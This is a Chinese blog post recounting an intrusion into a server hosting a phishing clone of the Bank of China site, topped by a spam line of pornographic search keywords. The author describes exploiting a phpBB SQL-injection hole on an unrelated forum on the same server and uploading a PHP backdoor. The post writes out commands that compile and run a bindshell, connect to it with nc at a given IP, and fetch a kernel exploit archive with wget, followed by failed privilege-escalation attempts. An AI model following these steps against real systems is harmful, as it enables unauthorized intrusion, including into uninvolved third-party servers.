日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

www.banochi.net 虛假中國銀行入侵嘗試實錄

27日晚看到天天網(wǎng)的一片報道:中國銀行網(wǎng)站再次遭遇克隆;假網(wǎng)站遠在北美
本來要整理規(guī)劃的,既然出了這個事情,好歹看看吧 。廢話不說,開始!
1、收集信息
服務(wù)器信息:;
Apache/1.3.33;;;
PHP/4.3.9;
網(wǎng)站主文件:;
http://www.banochi.net/english/index.shtml;
查看虛假網(wǎng)站,基本沒發(fā)現(xiàn)什么可用的東西,估計只有記錄密碼和ip的cgi程序 。除了服務(wù)器入侵,還可以考慮旁注 。
檢索其他站點,分析了幾個php站點的注入,沒太多利用的地方 。想起phpbb的洞洞,寫段代碼檢索一下viewtopic.php文件,找到一個phpbb2.0.10入侵點
http://www.bits-clsu.org/forum/viewtopic.php?t=1;
事后才想起可以用旁注工具直接來檢索,反正都一樣 。
2、上傳木馬
利用phpbb的洞,漏洞介紹“phpBB遠程任意SQL注入漏洞”,“phpbb〈2.0.11程序的sql注入漏洞分析”上傳php后門 。
3、生成bindshell
我還在看文件的時候,Edward就已經(jīng)做了個bindshell出來,呵呵!基本方法:
上傳bindshell.c
gcc;-o;/tmp/bind;bindshell.c;
/tmp/bind;
nc上去看看,還是在shell下比較方便 。
nc;-vv;216.22.48.72;7758;
4、采集系統(tǒng)信息
拿到webshell后就可以獲得一些基本的信息包括passwd、httpd.conf等等,檢索到虛假網(wǎng)站的絕對路徑;/home/banochin/public_html/,在webshell中查看文件創(chuàng)建的時期是服務(wù)器時間2004-12-15,在其cgi-;bin目錄下有如下文件
文件;;;;;創(chuàng)建日期;最后修改;大小;;;;;屬性;
[member];;;2005-02-21;21:39:03;2005-02-21;21:39:03;0700;
errlog.dat;2005-02-28;00:32:22;2005-02-28;00:32:22;140.186;KB;0600;
id.dat;;;2005-02-24;10:48:35;2005-02-24;10:48:35;1.727;KB;0600;
index.htm;2004-12-15;03:19:51;2004-12-15;03:19:51;0.697;KB;0644;
pwd.dat;;;2005-02-25;00:36:15;2005-02-25;00:36:15;0.170;KB;0600;
pwdbak.dat;2004-12-15;03:24:17;2004-12-15;03:19:55;0.516;KB;0600;
security.cgi;2004-12-15;03:24:03;2004-12-15;03:20:00;44.363;KB;0700;
visemailer.cgi;2004-12-15;03:24:04;2004-12-15;03:20:02;3.554;KB;0700;
可以看到最后記錄的密碼日期是2月25日,而瀏覽目錄后發(fā)現(xiàn)還包括了很多其他語言的中國銀行網(wǎng)站內(nèi)容,但基本都是html文件,想必是從中國銀行直接webdump下來的 。
內(nèi)核信息,因為我們對其目錄沒有寫權(quán)限,接著要做的就是提權(quán)了 。前后大概用了1小時左右,而剩下的提權(quán)工作卻花了我1天多的時間,結(jié)果還是沒搞定,郁悶!
uname;-r;
2.4.20-021stab022.11.777-enterprise;
5、本地提升權(quán)限測試
增加環(huán)境變量
export;PATH=/usr/bin:$PATH
否則會出現(xiàn)collect2:;cannot;find;`ld’錯誤!
(1)Linux;Kernel;moxa串行驅(qū)動BSS溢出漏洞
grsecurity;2.1.0;release;/;5;Linux;kernel;advisories
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件:
http://grsecurity.net/~spender/exploits_and_patches.tgz
測試:
wget;http://grsecurity.net/~spender/exploits_and_patches.tgz;
tar;-zxvf;exploits_and_patches.tgz;
cd;exploits_and_patches;
make;alloc=0x100000;
nasm;-f;elf;-DALLOCATE=32482374;mlock-dos.S;
make:;nasm:;Command;not;found;
make:;***;[;all;];Error;127;
結(jié)論:
缺少nasm,即使上傳rpm也不能夠執(zhí)行安裝!
(2)Linux;Kernel;uselib()特權(quán)提升漏洞
Linux;kernel;sys_uselib;local;root;vulnerability
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2

推薦閱讀